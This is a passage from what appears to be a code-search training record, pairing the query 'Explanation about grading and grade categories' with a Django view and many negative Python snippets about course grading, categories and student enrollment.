utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def bulk_beta_modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n action = request.GET.get('action')\r\n identifiers_raw = request.GET.get('identifiers')\r\n identifiers = _split_input_list(identifiers_raw)\r\n email_students = request.GET.get('email_students') in ['true', 'True', True]\r\n auto_enroll = request.GET.get('auto_enroll') in ['true', 'True', True]\r\n results = []\r\n rolename = 'beta'\r\n course = get_course_by_id(course_id)\r\n\r\n email_params = {}\r\n if email_students:\r\n email_params = get_email_params(course, auto_enroll=auto_enroll)\r\n\r\n for identifier in identifiers:\r\n try:\r\n error = False\r\n user_does_not_exist = False\r\n user = get_student_from_identifier(identifier)\r\n\r\n if action == 'add':\r\n allow_access(course, user, rolename)\r\n elif action == 'remove':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"Unrecognized action '{}'\".format(action)\r\n ))\r\n except User.DoesNotExist:\r\n error = True\r\n user_does_not_exist = True\r\n # catch and log any unexpected exceptions\r\n # so that one error doesn't cause a 500.\r\n except Exception as exc: # pylint: disable=broad-except\r\n log.exception(\"Error while #{}ing student\")\r\n log.exception(exc)\r\n error = True\r\n else:\r\n # If no exception thrown, see if we should send an email\r\n if email_students:\r\n send_beta_role_email(action, user, email_params)\r\n # See if we should autoenroll the student\r\n if auto_enroll:\r\n # Check if student is already enrolled\r\n if not CourseEnrollment.is_enrolled(user, course_id):\r\n CourseEnrollment.enroll(user, course_id)\r\n\r\n finally:\r\n # Tabulate the action result of this email address\r\n results.append({\r\n 'identifier': identifier,\r\n 'error': error,\r\n 'userDoesNotExist': user_does_not_exist\r\n })\r\n\r\n response_payload = {\r\n 'action': action,\r\n 'results': results,\r\n }\r\n return JsonResponse(response_payload)", "def test_edit_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('Breakfast')\n self.dashboard()\n rv = self.edit_category('JunkFood')\n self.assertIn(b'Category successfully updated', rv.data)", "def get_d3_section_grade_distrib(course_id, section):\r\n\r\n # Retrieve course object down to problems\r\n course = modulestore().get_course(course_id, depth=4)\r\n\r\n problem_set = []\r\n problem_info = {}\r\n c_subsection = 0\r\n for subsection in course.get_children()[section].get_children():\r\n c_subsection += 1\r\n c_unit = 0\r\n for unit in subsection.get_children():\r\n c_unit += 1\r\n c_problem = 0\r\n for child in unit.get_children():\r\n if (child.location.category == 'problem'):\r\n c_problem += 1\r\n problem_set.append(child.location)\r\n problem_info[child.location] = {\r\n 'id': child.location.to_deprecated_string(),\r\n 'x_value': \"P{0}.{1}.{2}\".format(c_subsection, c_unit, c_problem),\r\n 'display_name': own_metadata(child).get('display_name', ''),\r\n }\r\n\r\n # Retrieve grade distribution for these problems\r\n grade_distrib = get_problem_set_grade_distrib(course_id, problem_set)\r\n\r\n d3_data = []\r\n\r\n # Construct data for each problem to be sent to d3\r\n for problem in problem_set:\r\n stack_data = []\r\n\r\n if problem in grade_distrib: # Some problems have no data because students have not tried them yet.\r\n max_grade = float(grade_distrib[problem]['max_grade'])\r\n for (grade, count_grade) in grade_distrib[problem]['grade_distrib']:\r\n percent = 0.0\r\n if max_grade > 0:\r\n percent = round((grade * 100.0) / max_grade, 1)\r\n\r\n # Construct tooltip for problem in grade distibution view\r\n tooltip = {\r\n 'type': 'problem',\r\n 'problem_info_x': problem_info[problem]['x_value'],\r\n 'count_grade': count_grade,\r\n 'percent': percent,\r\n 'problem_info_n': problem_info[problem]['display_name'],\r\n 'grade': grade,\r\n 'max_grade': max_grade,\r\n }\r\n\r\n stack_data.append({\r\n 'color': percent,\r\n 'value': count_grade,\r\n 'tooltip': tooltip,\r\n })\r\n\r\n d3_data.append({\r\n 'xValue': problem_info[problem]['x_value'],\r\n 'stackData': stack_data,\r\n })\r\n\r\n return d3_data", "def updateEMPStudyData(self, study_id, study_score, web_app_user_id):\n con = self.getMetadataDatabaseConnection()\n con.cursor().callproc('qiime_assets.update_emp_study_data', [study_id, study_score, web_app_user_id])", "def test_update_risk_profile_using_put(self):\n pass" ]
[ "0.5649238", "0.5606058", "0.55875236", "0.55865836", "0.5551528", "0.5505576", "0.5498032", "0.54429334", "0.52882886", "0.5234603", "0.5189582", "0.51738596", "0.5154065", "0.51239836", "0.5069172", "0.50602853", "0.50570875", "0.5049785", "0.50334764", "0.5032367", "0.49906343", "0.49727163", "0.49399975", "0.49341947", "0.49280974", "0.49197677", "0.49064013", "0.48912913", "0.48832947", "0.48533538", "0.4810963", "0.47757939", "0.4756292", "0.4756057", "0.47368336", "0.47362405", "0.4733177", "0.47172433", "0.47148114", "0.47120714", "0.4710436", "0.47081092", "0.47016716", "0.46988428", "0.46894684", "0.4687749", "0.4685078", "0.46829864", "0.4681345", "0.4673318", "0.46722642", "0.46709177", "0.46694964", "0.46684748", "0.46671283", "0.46627378", "0.46544915", "0.4649509", "0.4643104", "0.4637708", "0.46315333", "0.46299648", "0.4628174", "0.46201298", "0.46183878", "0.46168622", "0.46034425", "0.45966762", "0.45958343", "0.45875427", "0.45807683", "0.45759356", "0.45720783", "0.45707902", "0.45602053", "0.4552366", "0.4550419", "0.45490503", "0.45394975", "0.4539376", "0.45370802", "0.45334342", "0.45227453", "0.45210645", "0.4517062", "0.45127472", "0.45043373", "0.449582", "0.44833282", "0.4481509", "0.44798943", "0.44781792", "0.44756088", "0.4475221", "0.4467937", "0.44576988", "0.44509375", "0.44493997", "0.444596", "0.444491" ]
0.46072274
66
Explanation about grading and grade categories.
def about(request, pk=None): if pk and get_grouptype('3') in request.user.groups.all(): ts = get_object_or_404(TimeSlot, pk=pk) else: ts = get_timeslot() return render(request, "results/about_grades.html", { 'scores': CategoryAspectResult.ResultOptions, "categories": GradeCategory.objects.filter(TimeSlot=ts), 'ts': ts, })
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_knowledge_category_terms(self):\n return # osid.grading.GradeQueryInspector", "def test_classify_grade(self):\n\t\ts = Student_Analytics()\n\t\tself.assertEqual(s.classify_grade(5.00),\"A+\")", "def what_is_the_grade(self):\n\t\treturn_dict = {\n\t\t\t'section_title': self.title, \n\t\t\t'section_weight': self.weight,\n\t\t\t'grade_value' : self.current_grade_value,\n\t\t\t'comment_text' : self.current_comment_text,\n\t\t\t'default_comments_text' : self.current_default_comment_text,\n\t\t\t'example_comments_text' : self.current_example_comment_text,\n\t\t\t'is_complete': self.is_complete\n\t\t}\n\n\t\treturn return_dict", "def category(self) -> PracticeCategory:\n return PracticeCategory.DEXTERITY", "def __str__(self):\n return str(self.__student_name) + \" has grade \" + str(self.__grade_value) + \" at \" + str(self.__discipline_name)", "def test_a_grade(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.submit_question_answer('p3', {'2_1': 'Correct'})\r\n self.check_grade_percent(1.0)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'A')", "def bmi_categories():\n # Variable to ensure PEP8 convention pass (amount of characters in line)\n your_bmi = \"your BMI Category is \"\n # Result to user in age below 18\n if int(age) < 18:\n \"\"\"\n If age of user is below 18\n \"\"\"\n if float(bmi) <= 18.5:\n print(f\"{name.capitalize()} {your_bmi}underweight\")\n elif float(bmi) >= 18.5 and float(bmi) <= 24.9:\n print(f\"{name.capitalize()} {your_bmi}normal\")\n elif float(bmi) >= 25 and float(bmi) <= 29.9:\n print(f\"{name.capitalize()} {your_bmi}overweight\")\n else:\n print(f\"{name.capitalize()} {your_bmi}obesity\")\n # Else result to user in age is over 18\n else:\n \"\"\"\n If age of user is equal or over 18 - adults\n \"\"\"\n if float(bmi) <= 16:\n print(f\"{name.capitalize()} {your_bmi}Severe Thinness\")\n elif float(bmi) >= 16 and float(bmi) <= 17:\n print(f\"{name.capitalize()} {your_bmi}Moderate Thinness\")\n elif float(bmi) >= 17 and float(bmi) <= 18.5:\n print(f\"{name.capitalize()} {your_bmi}Mild Thinness\")\n elif float(bmi) >= 18.5 and float(bmi) <= 25:\n print(f\"{name.capitalize()} {your_bmi}Normal\")\n elif float(bmi) >= 25 and float(bmi) <= 30:\n print(f\"{name.capitalize()} {your_bmi}Overweight\")\n elif float(bmi) >= 30 and float(bmi) <= 35:\n print(f\"{name.capitalize()} {your_bmi}Obese Class I\")\n elif float(bmi) >= 35 and float(bmi) <= 40:\n print(f\"{name.capitalize()} {your_bmi}Obese Class II\")\n else:\n print(f\"{name.capitalize()} {your_bmi}Obese Class III\")", "def calc_grade(self, average):\n if 95 <= average:\n return 'S'\n elif 90 <= average:\n return 'A'\n elif 80 <= average:\n return 'B'\n elif 70 <= average:\n return 'C'\n elif 60 <= average:\n return 'D'\n else:\n return 'F'", "def get_knowledge_category(self):\n if not self.has_knowledge_category():\n raise IllegalState()\n else:\n return Grade(self._get_grade_map(self._my_map['knowledgeCategoryId'])),", "def computeGrades(e1, e2, a):\n \n a = assignmentScores\n a.sort()\n i=0\n while i<10:\n sum+=sum a[i]\n avg = sum/10\n \n grade = ((e1 + e2) /2) * 0.4 + (avg) * 0.6\n \n return grade\n \n if grade >= 90 and grade <= 100:\n return(\"A\")\n \n elif grade >= 80 and grade < 90:\n return(\"B\")\n \n elif grade >= 70 and grade < 80:\n return(\"C\")\n \n elif grade >= 60 and grade < 70:\n return(\"D\")\n \n elif grade < 60:\n return(\"F\")", "def grade_calculate_grade(self):\n try:\n if int(self.root.ids.grade_input_grade.text) >= 85:\n grade = 'High Distinction'\n elif int(self.root.ids.grade_input_grade.text) >= 75:\n grade = 'Distinction'\n elif int(self.root.ids.grade_input_grade.text) >= 65:\n grade = 'Credit'\n elif int(self.root.ids.grade_input_grade.text) >= 50:\n grade = 'Pass'\n else:\n grade = 'Fail'\n self.root.ids.grade_output_label.text = 'Grade: ' + grade\n except ValueError:\n\n self.root.ids.grade_output_label.text = 'Invalid Grade'", "def college_selectivity():", "def lookup_relevant(score):\n category = \"\"\n if score > 2.0:\n category = \"RELEVANT\"\n elif score > 0.0:\n category = \"PARTIALLY RELEVANT\"\n else:\n category = \"NOT RELEVANT\"\n return category", "def test_avg_grade(self):\n\t\ts = Student_Analytics()\n\t\tself.assertEqual(s.classify_grade(s.avg_grade(3)),\"B\")", "def test_get_cat_score(self):\n classes = ['blue skin', 'pointy ears']\n negated_classes = []\n categories = ['ear feature', 'skin feature']\n\n categorical_score = self.annot_scorer._get_categorical_score(\n classes, negated_classes, categories,\n self.negation_weight, self.mock_ic_values\n )\n\n assert categorical_score == 0.7002519289078384", "def __age_categorize(self, age):\r\n # Baby age category - most at risk, highest categorical denomination\r\n if age <= 4:\r\n self.__age = 4\r\n # Youth age category - second most at risk\r\n elif 5 <= age <= 14:\r\n self.__age = 3\r\n # Adult age category - least at risk\r\n elif 15 <= age <= 64:\r\n self.__age = 1\r\n # Elderly age category - second least at risk\r\n else:\r\n self.__age = 2", "def test_category(self):\n # XXX identifiers would be groovy\n self.check_search(\n dict(category=u'36:self'), # trap\n [u'Ingrain'],\n 'simple category search, vs self',\n exact=True,\n )\n self.check_search(\n dict(category=u'14:target'), # protect\n [u'Conversion 2', u'False Swipe'],\n 'simple category search, vs target',\n exact=True,\n )\n\n # Multiple categories\n # sleep OR attack up\n self.check_search(\n dict(category=[u'29:self', u'15:target'], category_operator=u'any'),\n [u'Rest', u'Swagger'],\n 'multiple category search (OR)',\n exact=True,\n )\n\n # sleep AND heal self\n self.check_search(\n dict(category=[u'29:self', u'13:self'], category_operator=u'all'),\n [u'Rest'],\n 'multiple category search (AND)',\n exact=True,\n )", "def grade(first, second, third):\n score = round((first + second + third) / 3, 1)\n score_secondary = str(score)\n plusminus = int(score_secondary[1])\n if score > 100:\n return \"Wrong input, friend.\"\n else:\n if score >= 90:\n if plusminus >= 5:\n return \"A+\"\n else:\n return \"A-\"\n elif score >= 80:\n if plusminus >= 5:\n return \"B+\"\n else:\n return \"B-\"\n elif score >= 70:\n if plusminus >= 5:\n return \"C+\"\n else:\n return \"C-\"\n elif score >= 60:\n if plusminus >= 5:\n return \"D+\"\n else:\n return \"D-\"\n else:\n return \"F\"", "def _repr_(self):\n return \"Category of hyperbolic models of {}\".format(self.base())", "def concept_categorization(self):\n dataset = pd.read_csv(\"data/Categorization data set.csv\", sep=\";\", header=None)\n dataset.columns = ['concept','word']\n\n cti = {}\n for i,c in enumerate(np.unique(dataset.concept.values)):\n cti[c] = i\n y_true = dataset.concept.apply(lambda x: cti[x]).values\n vs = []\n preds = [''] * dataset.shape[0]\n for ind,w in enumerate(dataset.word.values):\n try:\n vs.append(self.embeddings_index[w])\n except:\n preds[ind] = 0 \n km = KMeans(n_clusters=22, random_state=0)\n km.fit(np.array(vs).astype(np.float32))\n for ind,w in enumerate(dataset.word.values):\n if preds[ind] == '':\n preds[ind] = km.predict(np.array([self.embeddings_index[w]]))[0]\n contingency_matrix = metrics.cluster.contingency_matrix(y_true, preds)\n #purity score\n return np.sum(np.amax(contingency_matrix, axis=0)) / np.sum(contingency_matrix)", "def get_level_terms(self):\n return # osid.grading.GradeQueryInspector", "def grade(self):\n if round(self.numAvg,0) >= 70:\n return round(self.numAvg,0)\n elif self.PassSummer:\n return 70\n elif round(self.numAvg,0) >= 55 and not self.PassSummer:\n return round(self.numAvg,0)\n else:\n return 55", "def dump_grading_context(course):\r\n hbar = \"{}\\n\".format(\"-\" * 77)\r\n msg = hbar\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\"\\\r\n % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += hbar\r\n msg += \"Listing grading context for course %s\\n\" % course.id.to_deprecated_string()\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsomething, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsomething)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n frmat = getattr(sdesc, 'format', None)\r\n aname = ''\r\n if frmat in graders:\r\n gform = graders[frmat]\r\n aname = '%s %02d' % (gform.short_label, gform.index)\r\n gform.index += 1\r\n elif sdesc.display_name in graders:\r\n gform = graders[sdesc.display_name]\r\n aname = '%s' % gform.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (format=%s, Assignment=%s%s)\\n\"\\\r\n % (sdesc.display_name, frmat, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def describe_detailed(self) -> str:\n one_to_one = []\n one_to_many = []\n many_to_one = []\n many_to_many = []\n cats_a: set[Category] = set()\n cats_b: set[Category] = set()\n for rule in self.rules:\n cats_a.update(rule.factors_categories_a.keys())\n cats_b.update(rule.factors_categories_b.keys())\n if rule.cardinality_a == \"one\" and rule.cardinality_b == \"one\":\n one_to_one.append(rule)\n elif rule.cardinality_a == \"one\":\n one_to_many.append(rule)\n elif rule.cardinality_b == \"one\":\n many_to_one.append(rule)\n else:\n many_to_many.append(rule)\n\n cat_a, cat_b = self.categorization_a.name, self.categorization_b.name\n\n r = f\"# Mapping between {cat_a} and {cat_b}\\n\\n\"\n r += \"## Simple direct mappings\\n\\n\"\n r += \"\\n\".join(\n rule.format_human_readable(categorization_separator=\"\")\n for rule in one_to_one\n )\n r += \"\\n\\n\"\n r += f\"## One-to-many mappings - one {cat_a} to many {cat_b}\\n\\n\"\n r += \"\\n\".join((rule.format_human_readable()) for rule in one_to_many)\n r += \"\\n\\n\"\n r += f\"## Many-to-one mappings - many {cat_a} to one {cat_b}\\n\\n\"\n r += \"\\n\".join((rule.format_human_readable()) for rule in many_to_one)\n r += \"\\n\\n\"\n r += f\"## Many-to-many mappings - many {cat_a} to many {cat_b}\\n\\n\"\n r += \"\\n\".join((rule.format_human_readable()) for rule in many_to_many)\n r += \"\\n\\n\"\n\n r += \"## Unmapped categories\\n\\n\"\n cats_missing_a = set(self.categorization_a.values()) - cats_a\n cats_missing_b = set(self.categorization_b.values()) - cats_b\n r += f\"### {cat_a}\\n\"\n r += \"\\n\".join(sorted(str(x) for x in cats_missing_a)) + \"\\n\\n\"\n r += f\"### {cat_b}\\n\"\n r += \"\\n\".join(sorted(str(x) for x in cats_missing_b)) + \"\\n\\n\"\n\n return r", "def getCategory():", "def on_briefing(self) -> Optional[Grade]:\n pass", "def dump_grading_context(course):\r\n msg = \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\" % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Listing grading context for course %s\\n\" % course.id\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsections, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsections)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n grade_format = getattr(sdesc, 'grade_format', None)\r\n aname = ''\r\n if grade_format in graders:\r\n gfmt = graders[grade_format]\r\n aname = '%s %02d' % (gfmt.short_label, gfmt.index)\r\n gfmt.index += 1\r\n elif sdesc.display_name in graders:\r\n gfmt = graders[sdesc.display_name]\r\n aname = '%s' % gfmt.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (grade_format=%s, Assignment=%s%s)\\n\" % (s.display_name, grade_format, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def category(self) -> PracticeCategory:\n return PracticeCategory.PERFORMANCE", "def get_grade(course_det):\n return course_det[1]", "def super_categories(self):\n R = self.base().base_ring()\n category = GradedHopfAlgebrasWithBasis(R)\n return [Realizations(self.base()), category.Quotients()]", "def categories(self):\n pass", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def remove_category(self,cat):\n if isinstance(cat,Category):\n cat = cat.name\n if cat.name in self.__categories:\n del self.__categories[cat.name]\n return True\n else:\n warnings.warn('Category \\'{}\\' is not in Gradebook.'.format(cat.name))\n return False", "def categories(self):\r\n return self.q(css='span.rubric-category').text", "def category_reducer(category):\n if not \"--\" in category:\n if category in BAD_CATEGORIES:\n return \"Unknown\"\n return category\n\n main, sub = category.split(\"--\")\n\n main = main.strip()\n if main in [\"Science\"]:\n return sub.strip()\n else:\n return main", "def get_grade(self) -> int :\n return self.grade", "def the_cats_ass():\n return __cat_whisperer()[Cat.ASS]", "def average_grade(self):\n grade_sum = 0\n grades_length = 0\n for c in self.courses_grades:\n if c[1] != \"-\":\n grade_sum += int(c[1])\n grades_length += 1\n average = grade_sum / grades_length\n return average", "def test_get_cat_score_w_negation(self):\n classes = ['blue skin', 'pointy ears']\n negated_classes = ['large ears', 'increased pigmentation']\n\n categories = ['ear feature', 'skin feature']\n\n categorical_score = self.annot_scorer._get_categorical_score(\n classes, negated_classes, categories,\n self.negation_weight, self.mock_ic_values\n )\n\n assert categorical_score == 0.7201759238096741", "def fk_grade(self, doc):\n num_sentences = _get_num_sentences(doc)\n num_words = _get_num_words(doc)\n num_syllables = _get_num_syllables(doc)\n if num_sentences == 0 or num_words == 0 or num_syllables == 0:\n return 0\n return (\n (11.8 * num_syllables / num_words)\n + (0.39 * num_words / num_sentences)\n - 15.59\n )", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! \\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def categoria(cad):\n \n # Vai ser usado o tuplo que contem todas as informacoes sobre as categorias das entidades definido nas linhas de codigo iniciais.\n # Sao acedidas as informacoes no indice 0 (Digito Inicial) e 1 (Categoria). \n \n # Caso o primeiro caracter nao seja um algarismo, chamamos a atencao ao utilizador para o erro. Caso seja, percorremos o tuplo com as informacoes sobre as categorias das entidades, e devolvemos a entidade correspondente ao digito inicial.\n \n \n if '0' <= cad[0] <= '9':\n\n c1=eval(cad[0])\n\n for e in t_cat_ent:\n \n if c1==e[0]:\n return e[1]\n \n \n else:\n raise ValueError ('function categoria(): O primeiro digito da cadeia nao e valido')", "def chapter_grades(self):\n return self.course_grade.chapter_grades", "def Categories():\n cat = {\n \t \"Featured\": 0,\n \t \"All\": 1,\n \t \"Collectibles\": 2,\n \t \"Clothing\": 3,\n \t \"BodyParts\": 4,\n \t \"Gear\": 5,\n \t \"Models\": 6,\n \t \"Plugins\": 7,\n\t \"Decals\": 8,\n \t \"Audio\": 9,\n \t \"Meshes\": 10,\n\t \"Accessories\": 11,\n\t \"AvatarAnimations\": 12,\n\t \"CommunityCreations\": 13,\n\t \"Video\": 14,\n\t \"Recommended\": 15\n }\n return cat", "def rating(grade_count):\r\n if grade_count == 0 :\r\n grade = 7\r\n else:\r\n grade = 2\r\n \r\n return grade", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def calculate_safety(data):\n\n\tgood_actions = data['actions'].apply(lambda x: ast.literal_eval(x)[0])\n\tgood_ratio = good_actions.sum() * 1.0 / (data['initial_deadline'] - data['final_deadline']).sum()\n\n\tif good_ratio == 1: # Perfect driving\n\t\tprint \"Perfect Driving!!\"\n\telse:\n\t\tprint \"Imperfect Driving :(\"\n\t \n\tmajor_acc = data['actions'].apply(lambda x: ast.literal_eval(x)[4]).sum()\n\tminor_acc = data['actions'].apply(lambda x: ast.literal_eval(x)[3]).sum()\n\tmajor_vio = data['actions'].apply(lambda x: ast.literal_eval(x)[2]).sum()\n\tminor_vio = data['actions'].apply(lambda x: ast.literal_eval(x)[1]).sum()\n\n\tprint \"Major accident = {}, Minor accident = {}, Major violation = {}, Minor violation = {}\"\\\n\t.format(major_acc, minor_acc, major_vio, minor_vio)\n\n\tif major_acc > 0: # Major accident\n\t\tgrade = \"F\"\n\telif minor_acc > 0: # Minor accident\n\t\tgrade = \"D\"\n\telif major_vio > 0: # Major violation\n\t\tgrade = \"C\"\n\telse: # Minor violation\n\t\tif minor_vio >= len(data)/2: # Minor violation in at least half of the trials\n\t\t\tgrade = \"B\"\n\t\telse:\n\t\t\tgrade = \"A\"\n\n\tprint \"Grade: {}\".format(grade)", "def readability(target_text):\n\n nb1 = total_words(target_text)\n nb2 = total_phrases(target_text)\n nb3 = total_syllables(target_text)\n k1 = 206.835\n k2 = 1.015\n k3 = 84.6\n score = round((k1 - k2 * (nb1 / nb2) - k3 * (nb3 / nb1)), 2)\n\n print_text = \"Reading level of\"\n if score > 90:\n level = '5th Grade'\n elif score > 80:\n level = '6th Grade'\n elif score > 70:\n level = '7th Grade'\n elif score > 60:\n level = '8-9th Grade'\n elif score > 50:\n level = '10-12th Grade'\n elif score > 30:\n level = 'College student'\n else:\n level = 'Gollege Graduate'\n\n print('Total words:', nb1)\n print('Total phrases:', nb2)\n print('Total syllables:', nb3)\n print('')\n print('Readability score:', score)\n print(print_text, level)", "def test_grade(self):\r\n # Sample variables x and y in the range [-10, 10]\r\n sample_dict = {'x': (-10, 10), 'y': (-10, 10)}\r\n\r\n # The expected solution is numerically equivalent to x+2y\r\n problem = self.build_problem(sample_dict=sample_dict,\r\n num_samples=10,\r\n tolerance=0.01,\r\n answer=\"x+2*y\")\r\n\r\n # Expect an equivalent formula to be marked correct\r\n # 2x - x + y + y = x + 2y\r\n input_formula = \"2*x - x + y + y\"\r\n self.assert_grade(problem, input_formula, \"correct\")\r\n\r\n # Expect an incorrect formula to be marked incorrect\r\n # x + y != x + 2y\r\n input_formula = \"x + y\"\r\n self.assert_grade(problem, input_formula, \"incorrect\")", "def _extract_life_sci_relevance(self, bib):\n life_sci_relevant = 0\n for system_key in ('ipc', 'ecla', 'ipcr', 'cpc'):\n try:\n for classif in bib[system_key]:\n if life_sci_relevant == 0 and self.relevant_regex.match(classif):\n life_sci_relevant = 1\n except KeyError:\n # Skip the warning - classifications are processed again below\n pass\n\n return life_sci_relevant", "def letter_grade(grade):\n\t# define dictionary of grading scale\n\t# Check the fillna above was filled w/ -1.0\n\td = {18.0: 'A', 17.0: 'A', 16.0: 'A', 15.0: 'A', 14.0: 'A', 13.0: 'A',\n\t12.0: 'A', 11.0: 'A', 10.0: 'A', 9.0: 'A', 8.0: 'B', \n\t7.0: 'C', 6.0: 'D', 5.0: 'F', 4.0: 'F', 3.0: 'F', 2.0: 'F', \n\t1.0: 'F', 0.0: 'F', -1.0: '-'}\n\t\n\t# get letter grade only if grade is not a string\n\tif type(grade) != str:\n\t\t# get the letter\n\t\tletter = d[grade]\n\t\treturn letter\n\telse:\n\t\treturn grade", "def grade_to_gpa(grade):\n\n letter_grade = \"\"\n gpa = 0.0\n\n if type(grade) is str:\n accepted_values = [\"A+\", \"A\", \"A-\", \"B+\", \"B\", \"B-\", \"FZ\"]\n\n # check that the grade is one of the accepted values\n if grade in accepted_values:\n\n # assign grade to letter_grade\n letter_grade = grade\n\n #If grade input is a string, but not an accepted value, raise a ValueError\n else:\n raise ValueError(\"Incorrect value. Grade must be an accepted letter grade.\")\n\n elif type(grade) is int:\n\n # check that grade is in the accepted range 0 to 100\n if 0 <= grade <= 100:\n\n # convert the numeric grade to a letter grade\n mark_to_letter = grade\n\n # assign the value to letter_grade\n # hint: letter_grade = mark_to_letter(grade)\n if mark_to_letter >= 90:\n letter_grade = \"A+\"\n elif mark_to_letter >= 85:\n letter_grade = \"A\"\n elif mark_to_letter >= 80:\n letter_grade = \"A-\"\n elif mark_to_letter >= 77:\n letter_grade = \"B+\"\n elif mark_to_letter >= 73:\n letter_grade = \"B\"\n elif mark_to_letter >= 70:\n letter_grade = \"B-\"\n else:\n letter_grade = \"FZ\"\n\n #If grade input is not in accepted range, raise ValueError\n else:\n raise ValueError(\"Incorrect value. Grade must be in the accepted range of 0 to 100.\")\n else:\n # raise a TypeError exception\n raise TypeError(\"Invalid type passed as parameter\")\n\n # write a long if-statement to convert letter_grade\n # assign the value to gpa\n if letter_grade == \"A+\":\n gpa = 4.0\n if letter_grade == \"A\":\n gpa = 4.0\n if letter_grade == \"A-\":\n gpa = 3.7\n if letter_grade == \"B+\":\n gpa = 3.3\n if letter_grade == \"B\":\n gpa = 3.0\n if letter_grade == \"B-\":\n gpa = 2.7\n if letter_grade == \"FZ\":\n gpa = 0.0\n\n #Return the gpa of the grade\n return gpa", "def feedback(self):\r\n # Get the green checkmark / red x labels\r\n # We need to filter out the similar-looking CSS classes\r\n # for the rubric items that are NOT marked correct/incorrect\r\n feedback_css = 'div.rubric-label>label'\r\n labels = [\r\n el_class for el_class in\r\n self.q(css=feedback_css).attrs('class')\r\n if el_class != 'rubric-elements-info'\r\n ]\r\n\r\n def map_feedback(css_class):\r\n \"\"\"\r\n Map CSS classes on the labels to correct/incorrect\r\n \"\"\"\r\n if 'choicegroup_incorrect' in css_class:\r\n return 'incorrect'\r\n elif 'choicegroup_correct' in css_class:\r\n return 'correct'\r\n else:\r\n return None\r\n\r\n return map(map_feedback, labels)", "def letter_grades(adict):\n\n for key in adict:\n\t if adict[key] >= 90:\n\t\t adict[key] = 'A'\n\t elif 80 <= adict[key] < 90:\n\t\t adict[key] = 'B'\n\t elif 70 <= adict[key] < 80:\n\t\t adict[key] = 'C'\n\t elif 60 <= adict[key] < 70:\n\t\t adict[key] = 'D'\n\t else:\n\t\t adict[key] = 'F'", "def test_b_grade_above(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.check_grade_percent(0.67)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'B')", "def __init__(self, idy, name):\n self.idy = idy\n self.name = name\n self.active = True\n self.grades = {}", "def test_b_grade_exact(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.check_grade_percent(0.33)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'B')", "def get_cognitive_process_terms(self):\n return # osid.grading.GradeQueryInspector", "def grade(self, request, collection_id=None):\n collection = self.get_object()\n # get learner\n serializer = LearnerSerializer(data=request.data['learner'])\n if not serializer.is_valid():\n 